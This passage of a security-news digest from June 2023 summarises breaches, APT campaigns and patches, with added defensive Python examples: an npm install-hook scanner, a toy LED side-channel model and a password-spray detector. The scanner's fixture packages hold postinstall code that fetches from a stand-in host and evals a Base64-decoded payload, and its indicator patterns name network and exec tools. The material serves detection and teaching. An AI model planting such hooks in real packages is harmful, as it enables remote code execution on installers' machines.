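The chain described above has a useful property for defenders: every link of it (an install-time hook, a network fetch, a token written to disk, a Base64 decode, a dynamic `eval`) is visible in the package tarball before anything runs, and the pairing means neither package looks complete on its own, so a reviewer should flag the first package's "fetch and stash a token" just as readily as the second package's "fetch, decode, execute". The following added example is not Phylum's tooling and the two fixture packages are constructed to mirror the abstract, not the real packages (names, URLs and file contents are invented). It scans a package's lifecycle scripts and any JavaScript files they hand to `node`, reports which indicators each hook matches, and flags a hook that both reaches the network and executes code dynamically.

```python
import json
import re
from pathlib import Path

LIFECYCLE_HOOKS = ("preinstall", "install", "postinstall", "prepare")

# Each indicator is one link of the chain the abstract describes.
INDICATORS = {
    "network_fetch": re.compile(r"(curl |wget |fetch\(|https?://|https?\.get\(|XMLHttpRequest)", re.I),
    "token_store": re.compile(r"\b(writeFileSync|writeFile|appendFileSync)\(", re.I),
    "base64_decode": re.compile(r"(atob\(|Buffer\.from\([^)]*,\s*['\"]base64['\"])", re.I),
    "dynamic_exec": re.compile(r"(\beval\(|new Function\(|child_process|\bexec(?:Sync)?\(|\bspawn\()", re.I),
}


def referenced_scripts(command):
    """Files a hook command hands to node, e.g. 'node install.js' -> ['install.js']."""
    return re.findall(r"\bnode\s+(\S+\.[cm]?js)\b", command)


def scan_package(manifest, files):
    """manifest: parsed package.json; files: {relative path: source text} from the tarball.
    Returns {hook: [indicator, ...]} for every lifecycle hook that matched something."""
    findings = {}
    scripts = manifest.get("scripts", {})
    for hook in LIFECYCLE_HOOKS:
        command = scripts.get(hook)
        if not command:
            continue
        blob = "\n".join([command] + [files.get(f, "") for f in referenced_scripts(command)])
        hits = [name for name, rx in INDICATORS.items() if rx.search(blob)]
        if hits:
            findings[hook] = hits
    return findings


def completes_chain(findings):
    """True when one hook both pulls from the network and executes code dynamically,
    which is what the second package of the pair looks like."""
    return any({"network_fetch", "dynamic_exec"} <= set(hits) for hits in findings.values())


def scan_unpacked_dir(path):
    """Scan an extracted package directory (e.g. `npm pack <pkg>` followed by `tar xzf`)."""
    root = Path(path)
    manifest = json.loads((root / "package.json").read_text())
    files = {p.relative_to(root).as_posix(): p.read_text(errors="replace") for p in root.rglob("*.js")}
    return scan_package(manifest, files)


# Constructed fixtures modelled on the two-package chain; not the real packages.
FIRST_PKG = {"name": "pair-part-one", "version": "1.0.0", "scripts": {"postinstall": "node setup.js"}}
FIRST_FILES = {"setup.js": """
const https = require('https'), fs = require('fs');
https.get('https://stage.invalid/token', r => {
  let body = ''; r.on('data', c => body += c);
  r.on('end', () => fs.writeFileSync('.stage-token', body));   // stash token for part two
});
"""}
SECOND_PKG = {"name": "pair-part-two", "version": "1.0.0", "scripts": {"postinstall": "node init.js"}}
SECOND_FILES = {"init.js": """
const https = require('https'), fs = require('fs'), os = require('os');
const token = fs.readFileSync('.stage-token', 'utf8');
https.get(`https://stage.invalid/next?token=${token}&os=${os.platform()}`, r => {
  let body = ''; r.on('data', c => body += c);
  r.on('end', () => { const code = Buffer.from(body, 'base64').toString(); if (code) eval(code); });
});
"""}
BENIGN_PKG = {"name": "native-addon", "version": "2.1.0", "scripts": {"install": "node-gyp rebuild"}}

if __name__ == "__main__":
    for pkg, files in ((FIRST_PKG, FIRST_FILES), (SECOND_PKG, SECOND_FILES), (BENIGN_PKG, {})):
        f = scan_package(pkg, files)
        print(pkg["name"], f, "CHAIN" if completes_chain(f) else "")
```

Pattern matching like this is a triage aid, not a verdict: a legitimate native addon may download prebuilt binaries in `install`, and a determined publisher can split or obfuscate the indicators. Pair it with the blunt control that defeats the whole chain in CI, `npm ci --ignore-scripts`, and re-enable scripts only for packages you have reviewed.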

June 27, 2023 – Government

Experts found hundreds of devices within federal networks having internet-exposed management interfaces Full Text

Abstract Researchers at Censys have identified hundreds of devices deployed within federal networks that have internet-exposed management interfaces. Researchers at Censys have analyzed the attack surfaces of more than 50 Federal Civilian Executive Branch...

Security Affairs

June 27, 2023 – Attack

Senior Choice, Inc. Provides Notice of Security Incident Full Text

Abstract The company, which manages three residential facilities in Pennsylvania, discovered suspicious activity in its internal systems used for business operations and immediately implemented measures to contain the situation.

Cyware

June 27, 2023 – Solution

Beyond Asset Discovery: How Attack Surface Management Prioritizes Vulnerability Remediation Full Text

Abstract As the business environment becomes increasingly connected, organizations' attack surfaces continue to expand, making it challenging to map and secure both known and unknown assets. In particular, unknown assets present security challenges related to shadow IT, misconfigurations, ineffective scan coverage, among others. Given attack surface sprawl and evolving threats, many organizations are embracing attack surface management (ASM) tools to discover and address critical exposures. Asset discovery is an important capability to have, and one that's helping to drive the adoption of attack surface management tools and services. That said, asset discovery is only one aspect of effective attack surface management. Making the attack surface as impenetrable as possible takes offensive security that goes far beyond the discovery phase. Why Asset Discovery Isn't Enough: Given the complexity and ever-expanding scale of the digital infrastructure at most companies, cataloging all the known

The Hacker News

June 27, 2023 – Attack

Schneider Electric and Siemens Energy are two more victims of a MOVEit attack Full Text

Abstract Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including Schneider Electric and Siemens Energy. The Clop ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial...

Security Affairs

June 27, 2023 – Business

Socure Buys Berbix for $70M to Fortify Identity Verification Full Text

Abstract The Nevada-based identity verification company said the acquisition of San Francisco-based Berbix will help it optimize the digital capturing and back-end processing of driver's licenses and passports at faster speeds and with greater accuracy.

Cyware

June 27, 2023 – Criminals

EncroChat Bust Leads to 6,558 Criminals’ Arrests and €900 Million Seizure Full Text

Abstract Europol on Tuesday announced that the takedown of EncroChat in July 2020 led to 6,558 arrests worldwide and the seizure of €900 million in illicit criminal proceeds. The law enforcement agency said that a subsequent joint investigation initiated by French and Dutch authorities intercepted and analyzed over 115 million conversations that took place over the encrypted messaging platform between no less than 60,000 users. Now almost three years later, the information obtained from digital correspondence has resulted in:
- Arrests of 6,558 suspects, including 197 high-value targets
- 7,134 years of imprisonment of convicted criminals
- Confiscation of €739.7 million in cash
- Freeze of €154.1 million in assets or bank accounts
- Seizure of 30.5 million pills of chemical drugs
- Seizure of 103.5 tonnes of cocaine, 163.4 tonnes of cannabis, and 3.3 tonnes of heroin
- Seizure of 971 vehicles, 83 boats, and 40 planes
- Seizure of 271 estates or homes, and
- Seizure of 923 weapons, as well

The Hacker News

June 27, 2023 – Cryptocurrency

JOKERSPY used to target a cryptocurrency exchange in Japan Full Text

Abstract An unnamed Japanese cryptocurrency exchange was the victim of a cyber attack aimed at deploying an Apple macOS backdoor named JokerSpy. Elastic Security Labs researchers provided details about a recently discovered intrusion at an unnamed cryptocurrency...

Security Affairs

June 27, 2023 – Breach

Schneider Electric and Siemens Energy Among the Latest Victims of MOVEit Zero-Day Attacks Full Text

Abstract The Cl0p ransomware group added five new victims of MOVEit attacks to its dark web leak site, including the industrial control systems giants Schneider Electric and Siemens Energy.

Cyware

June 27, 2023 – Malware

Anatsa Banking Trojan Targeting Users in US, UK, Germany, Austria, and Switzerland Full Text

Abstract A new Android malware campaign has been observed pushing the Anatsa banking trojan to target banking customers in the U.S., U.K., Germany, Austria, and Switzerland since the start of March 2023. "The actors behind Anatsa aim to steal credentials used to authorize customers in mobile banking applications and perform Device-Takeover Fraud (DTO) to initiate fraudulent transactions," ThreatFabric said in an analysis published Monday. The Dutch cybersecurity company said Anatsa-infected Google Play Store dropper apps have accrued over 30,000 installations to date, indicating that the official app storefront has become an effective distribution vector for the malware. Anatsa, also known by the name TeaBot and Toddler, first emerged in early 2021, and has been observed masquerading as seemingly innocuous utility apps like PDF readers, QR code scanners, and two-factor authentication (2FA) apps on Google Play to siphon users' credentials. It has since become one o

The Hacker News

June 27, 2023 – Business

CalypsoAI Raises $23 Million for AI Security Tech Full Text

Abstract The company, founded by DARPA, NASA, and DoD veterans, said the Series A-1 financing was led by Paladin Capital Group. Existing investors, including Lockheed Martin Ventures, and new investors Hakluyt Capital and Expeditions Fund also took part.

Cyware

June 27, 2023 – Vulnerabilities

New Fortinet’s FortiNAC Vulnerability Exposes Networks to Code Execution Attacks Full Text

Abstract Fortinet has rolled out updates to address a critical security vulnerability impacting its FortiNAC network access control solution that could lead to the execution of arbitrary code. Tracked as CVE-2023-33299, the flaw is rated 9.6 out of 10 for severity on the CVSS scoring system. It has been described as a case of Java untrusted object deserialization. "A deserialization of untrusted data vulnerability [CWE-502] in FortiNAC may allow an unauthenticated user to execute unauthorized code or commands via specifically crafted requests to the tcp/1050 service," Fortinet said in an advisory published last week. The shortcoming impacts the following products, with patches available in FortiNAC versions 7.2.2, 9.1.10, 9.2.8, and 9.4.3 or later:
- FortiNAC version 9.4.0 through 9.4.2
- FortiNAC version 9.2.0 through 9.2.7
- FortiNAC version 9.1.0 through 9.1.9
- FortiNAC version 7.2.0 through 7.2.1
- FortiNAC 8.8 all versions
- FortiNAC 8.7 all versions
- FortiNAC 8.6 all v

The Hacker News

June 27, 2023 – Vulnerabilities

Chrome 114 Update Patches High-Severity Vulnerabilities Full Text

Abstract Google this week announced a new Chrome 114 update that patches a total of four vulnerabilities, including three high-severity bugs reported by external security researchers.

Cyware

June 27, 2023 – Hacker

The potent cyber adversary threatening to further inflame Iranian politics Full Text

Abstract The latest hack claimed by GhyamSarnegouni demonstrates the depth of information that hackers and hacktivists are accessing in Iran's internal politics, with potentially significant implications for national security.

Cyware

June 26, 2023 – Outage

Sweetwater Union High School District confirms data breach caused outages in February Full Text

Abstract The district says their investigation determined in mid-May that some personal information from current and former employees, their dependents, students, and families, was potentially accessed by attackers from the district's network.

Cyware

June 26, 2023 – Education

Researchers Find Way to Recover Cryptographic Keys by Analyzing LED Flickers Full Text

Abstract In what's an ingenious side-channel attack, a group of academics has found that it's possible to recover secret keys from a device by analyzing video footage of its power LED. "Cryptographic computations performed by the CPU change the power consumption of the device which affects the brightness of the device's power LED," researchers from the Ben-Gurion University of the Negev and Cornell University said in a study. By taking advantage of this observation, it's possible for threat actors to leverage video camera devices such as an iPhone 13 or an internet-connected surveillance camera to extract the cryptographic keys from a smart card reader. Specifically, video-based cryptanalysis is accomplished by obtaining video footage of rapid changes in an LED's brightness and exploiting the video camera's rolling shutter effect to capture the physical emanations. "This is caused by the fact that the power LED is connected directly to the pow

The Hacker News
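
The part of the abstract above that most often puzzles readers is why a 60 frames-per-second camera can follow brightness changes that happen thousands of times a second. The answer is the rolling shutter: the sensor exposes its rows one after another, so if the LED fills the frame, each row is a separate brightness reading and a frame yields as many samples as it has rows. The following added example is a deliberately simplified model of that sampling argument, not the researchers' code or their signal-processing pipeline (the real work involved noise, exposure time, frame timing and a smart card reader's actual power profile). All of the parameters, the "key-dependent" bit sequence, the two brightness levels, the frame rate and row count, are constructed for illustration.

```python
# Constructed model parameters; the real study measured a smart card reader's power LED.
SECRET_BITS = [1, 0, 1, 1, 0, 0, 1, 0]   # toy key-dependent operation sequence
T_BIT = 0.5e-3                           # each operation lasts 0.5 ms (2,000 per second)
HIGH, LOW = 1.00, 0.70                   # relative LED brightness: costly op vs. baseline
FPS, ROWS = 60, 1000                     # camera frame rate and sensor rows


def led_brightness(t, bits=SECRET_BITS, t_bit=T_BIT):
    """Brightness at time t. The LED hangs off the power rail, so a costlier
    operation (a '1') draws more current and the LED shines slightly brighter."""
    i = int(t // t_bit)
    if i < 0 or i >= len(bits):
        return LOW
    return HIGH if bits[i] else LOW


def global_shutter_samples(signal, duration, fps=FPS):
    """A global shutter exposes the whole frame at once: one sample per frame."""
    return [(f / fps, signal(f / fps)) for f in range(int(duration * fps) + 1) if f / fps < duration]


def rolling_shutter_samples(signal, duration, fps=FPS, rows=ROWS):
    """A rolling shutter exposes rows one after another. Reading the LED's
    brightness row by row gives fps*rows samples per second instead of fps.
    (Idealised: no readout gap between frames, no exposure-time blur.)"""
    samples = []
    for f in range(int(duration * fps) + 1):
        for r in range(rows):
            t = f / fps + r / (fps * rows)
            if t >= duration:
                break
            samples.append((t, signal(t)))
    return samples


def recover_bits(samples, n_bits, t_bit=T_BIT):
    """Average the brightness inside each operation window and threshold it.
    Windows that received no sample at all come back as None."""
    sums, counts = [0.0] * n_bits, [0] * n_bits
    for t, v in samples:
        i = int(t // t_bit)
        if 0 <= i < n_bits:
            sums[i] += v
            counts[i] += 1
    mid = (HIGH + LOW) / 2
    return [None if c == 0 else int(s / c > mid) for s, c in zip(sums, counts)]


if __name__ == "__main__":
    duration = len(SECRET_BITS) * T_BIT      # 4 ms of computation
    fast = rolling_shutter_samples(led_brightness, duration)
    slow = global_shutter_samples(led_brightness, duration)
    print(len(fast), "rolling-shutter samples ->", recover_bits(fast, len(SECRET_BITS)))
    print(len(slow), "global-shutter sample(s) ->", recover_bits(slow, len(SECRET_BITS)))
```

With these numbers the global shutter sees the whole 4 ms computation as a single sample, while the rolling shutter delivers 240 samples, thirty per operation, and the bit sequence falls out of a simple threshold. The countermeasures the model suggests are the ones the study's premise points at: decouple the LED from the CPU's power rail (a separate regulator or a capacitor on the LED supply), or make the cryptographic operation's power draw independent of the key.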

June 26, 2023 – Policy and Law

Citizen of Croatia charged with running the Monopoly Market drug marketplace Full Text

Abstract Milomir Desnica, a citizen of Croatia and Serbia, has been charged with running the Monopoly Market drug darknet marketplace. Milomir Desnica (33), a citizen of Croatia and Serbia, has been extradited from Austria to the United States to face charges...

Security Affairs

June 26, 2023 – Breach

MOVEit Breach Exposes Sensitive Data on New York City Public Schools Full Text

Abstract A MOVEit cyberattack has exposed sensitive data on around 45 thousand New York City Public School students - as well as Department of Education staff and service providers.

Cyware

June 26, 2023 – Attack

Japanese Cryptocurrency Exchange Falls Victim to JokerSpy macOS Backdoor Attack Full Text

Abstract An unknown cryptocurrency exchange located in Japan was the target of a new attack earlier this month to deploy an Apple macOS backdoor called JokerSpy. Elastic Security Labs, which is monitoring the intrusion set under the name REF9134, said the attack led to the installation of Swiftbelt, a Swift-based enumeration tool inspired by an open-source utility called SeatBelt. JokerSpy was first documented by Bitdefender last week, describing it as a sophisticated toolkit designed to breach macOS machines. Very little is known about the threat actor behind the operation other than the fact that the attacks leverage a set of programs written in Python and Swift that come with capabilities to gather data and execute arbitrary commands on compromised hosts. A primary component of the toolkit is a self-signed multi-architecture binary known as xcc that's engineered to check for FullDiskAccess and ScreenRecording permissions. The file is signed as XProtectCheck, indicating an

The Hacker News

June 26, 2023 – Attack

Energy company Suncor suffered a cyber attack and its subsidiary Petro-Canada reported problems at its gas stations in Canada Full Text

Abstract The cyber attack suffered by Suncor Energy impacted payment operations at Petro-Canada gas stations in Canada. Suncor Energy is Canada's leading integrated energy company that provides oil sands development, production and upgrading, offshore oil and gas,...

Security Affairs

June 26, 2023 – Criminals

Cybercriminals target high-profit companies: AEI Full Text

Abstract Cybercriminals tend to strike highly profitable companies, those holding abundant cash, and organizations that spend generously on advertising, according to an American Enterprise Institute study of cyberattacks from January 1999 until January 2022.

Cyware

June 26, 2023 – Education

How Generative AI Can Dupe SaaS Authentication Protocols — And Effective Ways To Prevent Other Key AI Risks in SaaS Full Text

Abstract Security and IT teams are routinely forced to adopt software before fully understanding the security risks. And AI tools are no exception. Employees and business leaders alike are flocking to generative AI software and similar programs, often unaware of the major SaaS security vulnerabilities they're introducing into the enterprise. A February 2023 generative AI survey of 1,000 executives revealed that 49% of respondents use ChatGPT now, and 30% plan to tap into the ubiquitous generative AI tool soon. Ninety-nine percent of those using ChatGPT claimed some form of cost-savings, and 25% attested to reducing expenses by $75,000 or more. As the researchers conducted this survey a mere three months after ChatGPT's general availability, today's ChatGPT and AI tool usage is undoubtedly higher. Security and risk teams are already overwhelmed protecting their SaaS estate (which has now become the operating system of business) from common vulnerabilities such as misconfigurati

The Hacker News

June 26, 2023 – Vulnerabilities

Internet Systems Consortium (ISC) fixed three DoS flaws in BIND Full Text

Abstract The Internet Systems Consortium (ISC) addressed three denial-of-service (DoS) vulnerabilities in the DNS software suite BIND. The Internet Systems Consortium (ISC) released security updates to address three denial-of-service (DoS) vulnerabilities...

Security Affairs

June 26, 2023 – Botnet

Mirai Variant Targets Multiple IoT Vulnerabilities in Recent Campaign Full Text

Abstract Unit 42 researchers uncovered a modified version of the Mirai botnet that is actively abusing at least 22 security flaws in devices manufactured by the likes of D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek. The attackers aim to take control of these devices and utilize them to carry ...

Cyware

June 26, 2023 – Attack

Microsoft Warns of Widescale Credential Stealing Attacks by Russian Hackers Full Text

Abstract Microsoft has disclosed that it's detected a spike in credential-stealing attacks conducted by the Russian state-affiliated hacker group known as Midnight Blizzard. The intrusions, which made use of residential proxy services to obfuscate the source IP address of the attacks, target governments, IT service providers, NGOs, defense, and critical manufacturing sectors, the tech giant's threat intelligence team said. Midnight Blizzard, formerly known as Nobelium, is also tracked under the monikers APT29, Cozy Bear, Iron Hemlock, and The Dukes. The group, which drew worldwide attention for the SolarWinds supply chain compromise in December 2020, has continued to rely on unseen tooling in its targeted attacks aimed at foreign ministries and diplomatic entities. It's a sign of how determined they are to keep their operations up and running despite being exposed, which makes them a particularly formidable actor in the espionage area. "These credential attacks us

The Hacker News
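
The operational detail in the item above that matters for detection engineering is the use of residential proxies: the attacker spreads a credential attack across many consumer IP addresses and ASNs, so the classic rule "one IP fails against many accounts" never fires, even though the aggregate picture (many accounts, many sources, one or two attempts each) is unmistakable. The following added example is not Microsoft's detection logic and does not use Microsoft's sign-in log schema; the records are constructed in a simple key=value format to keep it self-contained. It runs both the per-source rule and an aggregate rule over the same sample and shows that only the aggregate one catches the distributed pattern.

```python
import re
from collections import Counter, defaultdict

# Constructed sign-in records (key=value), not a real product's log format.
SAMPLE_LOG = "\n".join(
    [f"2023-06-20T10:{m:02d}:00Z user={u}@corp.example src=198.51.100.{i} "
     f"asn=AS6449{i % 7} result=FAILURE reason=InvalidPassword"
     for m, (u, i) in enumerate([("alice", 11), ("bob", 12), ("carol", 13), ("dave", 14),
                                 ("erin", 15), ("frank", 16), ("grace", 17), ("heidi", 18),
                                 ("alice", 19), ("bob", 20)])]
    + ["2023-06-20T10:30:00Z user=alice@corp.example src=203.0.113.5 asn=AS64500 result=SUCCESS reason=-",
       "2023-06-20T10:31:00Z user=ivan@corp.example src=203.0.113.5 asn=AS64500 result=FAILURE reason=InvalidPassword"]
)

LINE_RX = re.compile(r"^(?P<ts>\S+) user=(?P<user>\S+) src=(?P<src>\S+) asn=(?P<asn>\S+) "
                     r"result=(?P<result>\S+) reason=(?P<reason>\S+)$")


def parse_log(text):
    """One dict per well-formed line; malformed lines are skipped."""
    return [m.groupdict() for m in map(LINE_RX.match, text.splitlines()) if m]


def spray_by_source(events, min_users=5):
    """Classic spray: a single source IP failing against many different accounts."""
    users = defaultdict(set)
    for e in events:
        if e["result"] == "FAILURE":
            users[e["src"]].add(e["user"])
    return {ip: len(u) for ip, u in users.items() if len(u) >= min_users}


def distributed_spray(events, min_users=5, min_sources=5, max_per_source=2):
    """Spray routed through rotating proxies: many accounts, many sources and ASNs,
    but so few attempts per source that per-IP rules stay quiet.
    Returns a summary when the aggregate crosses the thresholds, else None."""
    failures = [e for e in events if e["result"] == "FAILURE"]
    users = {e["user"] for e in failures}
    per_source = Counter(e["src"] for e in failures)
    if (len(users) >= min_users and len(per_source) >= min_sources
            and max(per_source.values(), default=0) <= max_per_source):
        return {"users": sorted(users), "sources": len(per_source),
                "asns": len({e["asn"] for e in failures})}
    return None


if __name__ == "__main__":
    events = parse_log(SAMPLE_LOG)
    print("per-source rule:", spray_by_source(events))        # {} : nothing reaches the threshold
    print("aggregate rule :", distributed_spray(events))      # 9 users, 11 sources, 8 ASNs
```

In production the aggregate rule runs over a sliding window (an hour is a common starting point) and its thresholds are tuned against the tenant's normal failure rate; note that a genuine typo (the `ivan` failure in the sample) is swept into the summary, so the alert says "a spray is under way against these accounts", and per-account review follows. Mitigations that do not depend on detecting the spray at all, phishing-resistant MFA and conditional access that treats anonymiser and residential-proxy ranges as untrusted, remain the stronger controls.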

June 26, 2023 – APT

China-linked APT group VANGUARD PANDA uses a new tradecraft in recent attacks Full Text

Abstract China-linked APT group VANGUARD PANDA, aka Volt Typhoon, was spotted using novel tradecraft to gain initial access to target networks. CrowdStrike researchers observed the China-linked APT group VANGUARD PANDA, aka Volt Typhoon, using a novel...

Security Affairs

June 26, 2023 – Outage

Activision Blizzard Games Crippled by Hours-Long DDoS Attack Full Text

Abstract The attack lasted for more than 10 hours and was mitigated late on Sunday, according to Activision Blizzard’s statement on Twitter. Blizzard has not yet identified the hacker group behind it and no one has yet come forward to claim responsibility.

Cyware

June 26, 2023 – Hacker

Chinese Hackers Using Never-Before-Seen Tactics for Critical Infrastructure Attacks Full Text

Abstract The newly discovered Chinese nation-state actor known as Volt Typhoon has been observed to be active in the wild since at least mid-2020, with the hacking crew linked to never-before-seen tradecraft to retain remote access to targets of interest. The findings come from CrowdStrike, which is tracking the adversary under the name Vanguard Panda. "The adversary consistently employed ManageEngine Self-service Plus exploits to gain initial access, followed by custom web shells for persistent access, and living-off-the-land (LotL) techniques for lateral movement," the cybersecurity company said. Volt Typhoon, also known as Bronze Silhouette, is a cyber espionage group from China that's been linked to network intrusion operations against the U.S. government, defense, and other critical infrastructure organizations. An analysis of the group's modus operandi has revealed its emphasis on operational security, carefully using an extensive set of open-source tools against

The Hacker News

June 26, 2023 – Ransomware

An Overview of the Different Versions of the Trigona Ransomware Full Text

Abstract Trigona ransomware is a relatively new family that targets compromised MSSQL servers and has been detected mainly in the technology and healthcare industries in countries such as the US, India, and Israel.

Cyware

June 26, 2023 – General

Congress needs ‘private sector buy-in’ to address cyber workforce shortage Full Text

Abstract Organizations are working to educate and train the next generation of professionals to fill critical cybersecurity vacancies, but private sector firms need to change their hiring practices to integrate this pool of talent into the workforce.

Cyware

June 26, 2023 – Malware

Trojanized Super Mario Bros game spreads malware Full Text

Abstract Researchers observed threat actors spreading a trojanized Super Mario Bros game installer to deliver multiple malware families. Researchers from Cyble Research and Intelligence Labs (CRIL) discovered a trojanized Super Mario Bros game installer for Windows...

Security Affairs

June 25, 2023 – Policy and Law

Twitter hacker sentenced to five years in prison for cybercrime offenses Full Text

Abstract A U.K. citizen, who was involved in the attack on Twitter in 2020, was sentenced to five years in prison for cybercrime offenses. Joseph James O'Connor, aka PlugwalkJoe (24), the hacker who was involved in the attacks on Twitter in 2020, was sentenced...

Security Affairs

June 25, 2023 – General

Security Affairs newsletter Round 425 by Pierluigi Paganini – International edition Full Text

Abstract A new round of the weekly SecurityAffairs newsletter arrived! Every week the best security articles from Security Affairs are free for you in your email box. Enjoy a new round of the weekly SecurityAffairs newsletter, including the international press. Someone...

Security Affairs

June 24, 2023 – Vulnerabilities

US Military Personnel Targeted by Unsolicited Smartwatches Linked to Data Breaches Full Text

Abstract Recent reports indicate that these seemingly innocuous devices, once activated, automatically connect to Wi-Fi networks and establish unauthorized connections with users’ cell phones, potentially exposing sensitive personal data.

Cyware

June 24, 2023 – Government

U.S. Cybersecurity Agency Adds 6 Flaws to Known Exploited Vulnerabilities Catalog Full Text

Abstract The U.S. Cybersecurity and Infrastructure Security Agency has added a batch of six flaws to its Known Exploited Vulnerabilities (KEV) catalog, citing evidence of active exploitation. This comprises three vulnerabilities that Apple patched this week (CVE-2023-32434, CVE-2023-32435, and CVE-2023-32439), two flaws in VMware (CVE-2023-20867 and CVE-2023-20887), and one shortcoming impacting Zyxel devices (CVE-2023-27992). CVE-2023-32434 and CVE-2023-32435, both of which allow code execution, are said to have been exploited as zero-days to deploy spyware as part of a years-long cyber espionage campaign that commenced in 2019. Dubbed Operation Triangulation, the activity culminates in the deployment of TriangleDB that's designed to harvest a wide range of information from compromised devices, such as creating, modifying, removing, and stealing files, listing and terminating processes, gathering credentials from iCloud Keychain, and tracking a user's location. The

The Hacker News

June 24, 2023 – Botnet

Researcher Identifies Popular Swing VPN Android App as DDoS Botnet Full Text

Abstract Swing VPN is a legitimate VPN app developed for Android and iOS systems by Limestone Software Solutions. However, according to researcher Lecromee, the Android version of this app is a DDoS botnet and allegedly harbors malicious intent.

Cyware

June 24, 2023 – Criminals

Twitter Hacker Sentenced to 5 Years in Prison for $120,000 Crypto Scam Full Text

Abstract A U.K. citizen who took part in the massive July 2020 hack of Twitter has been sentenced to five years in prison in the U.S. Joseph James O'Connor (aka PlugwalkJoe), 24, was handed the sentence on Friday in the Southern District of New York, a little over a month after he pleaded guilty to the criminal schemes. He was arrested in Spain in July 2021. The infamous Twitter breach allowed the defendant and his co-conspirators to obtain unauthorized access to backend tools used by Twitter, abusing them to hijack 130 popular accounts to perpetrate a crypto scam that netted them about $120,000 in illegal profits. "In other instances, the co-conspirators sold access to Twitter accounts to others," the U.S. Department of Justice (DoJ) said. "O'Connor communicated with others regarding purchasing unauthorized access to a variety of Twitter accounts, including accounts associated with public figures around the world." The defendant has also been accused o

The Hacker News

June 24, 2023 – Government

Someone is sending mysterious smartwatches to the US Military personnel Full Text

Abstract U.S. Army’s Criminal Investigation Division warns that US military personnel have reported receiving unsolicited smartwatches in the mail. The U.S. Army’s Criminal Investigation Division reported that service members across the military received...

Security Affairs

June 23, 2023 – Breach

2.5 million Genworth policyholders affected by MOVEit hack Full Text

Abstract A third-party vendor lost the personal data of at least 2.5 million Genworth Financial policyholders, including Social Security numbers, to the Russian Cl0p ransomware gang, according to the Fortune 500 insurer.

Cyware

June 23, 2023 – Criminals

Cybercrime Group ‘Muddled Libra’ Targets BPO Sector with Advanced Social Engineering Full Text

Abstract A threat actor known as Muddled Libra is targeting the business process outsourcing (BPO) industry with persistent attacks that leverage advanced social engineering ploys to gain initial access. "The attack style defining Muddled Libra appeared on the cybersecurity radar in late 2022 with the release of the 0ktapus phishing kit, which offered a prebuilt hosting framework and bundled templates," Palo Alto Networks Unit 42 said in a technical report. Libra is the designation given by the cybersecurity company for cybercrime groups. The "muddled" moniker for the threat actor stems from the prevailing ambiguity with regards to the use of the 0ktapus framework. 0ktapus, also known as Scatter Swine, refers to an intrusion set that first came to light in August 2022 in connection with smishing attacks against over 100 organizations, including Twilio and Cloudflare. Then in late 2022, CrowdStrike detailed a string of cyber assaults aimed at telecom and BPO co

The Hacker News

June 23, 2023 – Solution

A New Kill Chain Approach to Disrupting Online Threats Full Text

Abstract The defender community has learned a great deal since the 2016 U.S. election, but it still needs to find a common language.

Lawfare

June 23, 2023 – Government

CISA orders govt agencies to fix recently disclosed flaws in Apple devices Full Text

Abstract U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new vulnerabilities to its Known Exploited Vulnerabilities catalog. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) added six new security flaws to its Known...

Security Affairs

June 23, 2023 – Business

Google announces $20 million investment for cyber clinics Full Text

Abstract By deploying students to community organizations to improve digital defenses, university cybersecurity clinics aim to give students cybersecurity experience, improve local defensive capacity and steer students toward work in cybersecurity.

Cyware

June 23, 2023 – Education

The Power of Browser Fingerprinting: Personalized UX, Fraud Detection, and Secure Logins Full Text

Abstract The case for browser fingerprinting: personalizing user experience, improving fraud detection, and optimizing login security. Have you ever heard of browser fingerprinting? You should! It's an online user identification technique that collects information about a visitor's web browser and its configuration preferences to associate individual browsing sessions with a single website visitor. With browser fingerprinting, many pieces of data can be collected about a user's web browser and device, such as screen resolution, location, language, and operating system. When you stitch these pieces together, they reveal a unique combination of information that forms every user's visitor ID or "digital fingerprint." Websites can use the visitor ID in various ways, including personalizing the user's experience, improving fraud detection, and optimizing login security. This article discusses the case for browser fingerprinting and how to use it safely on your websi

The Hacker News

June 23, 2023 – Vulnerabilities

VMware fixed five memory corruption issues in vCenter Server Full Text

Abstract VMware addressed multiple memory corruption vulnerabilities in vCenter Server that can be exploited to achieve remote code execution. VMware released security updates to address five memory corruption vulnerabilities (CVE-2023-20892, CVE-2023-20893, CVE-2023-20894,...

Security Affairs

June 23, 2023 – Policy and Law

MOVEit Data Breach Victims Sue Progress Software Full Text

Abstract Fallout for Progress Software continues over a massive data breach that appears to have affected hundreds of private and public sector organizations that use its MOVEit file transfer software.

Cyware

June 23, 2023 – Malware

Powerful JavaScript Dropper PindOS Distributes Bumblebee and IcedID Malware Full Text

Abstract A new strain of JavaScript dropper has been observed delivering next-stage payloads like Bumblebee and IcedID. Cybersecurity firm Deep Instinct is tracking the malware as PindOS, which contains the name in its "User-Agent" string. Both Bumblebee and IcedID serve as loaders, acting as a vector for other malware on compromised hosts, including ransomware. A recent report from Proofpoint highlighted IcedID's abandoning of banking fraud features to solely focus on malware delivery. Bumblebee, notably, is a replacement for another loader called BazarLoader, which has been attributed to the now-defunct TrickBot and Conti groups. A report from Secureworks in April 2022 found evidence of collaboration between several actors in the Russian cybercrime ecosystem, including that of Conti, Emotet, and IcedID. Deep Instinct's source code analysis of PindOS shows that it contains comments in Russian, raising the possibility of a continued partnership between

The Hacker News

June 23, 2023 – Vulnerabilities

Fortinet fixes critical FortiNAC RCE, install updates asap Full Text

Abstract Fortinet addressed a critical remote command execution vulnerability, tracked as CVE-2023-33299, affecting FortiNAC solution. FortiNAC is a network access control (NAC) solution designed by Fortinet that is used by organizations to secure and control...

Security Affairs

June 23, 2023 – Botnet

New Mirai botnet targets tens of flaws in popular IoT devices Full Text

Abstract The botnet has been observed targeting IoT devices, routers, DVRs, access control systems, and Solar power generation monitoring systems from brands such as D-Link, Arris, Zyxel, TP-Link, Tenda, Netgear, and MediaTek.

Cyware

June 23, 2023 – Government

NSA Releases Guide to Combat Powerful BlackLotus Bootkit Targeting Windows Systems Full Text

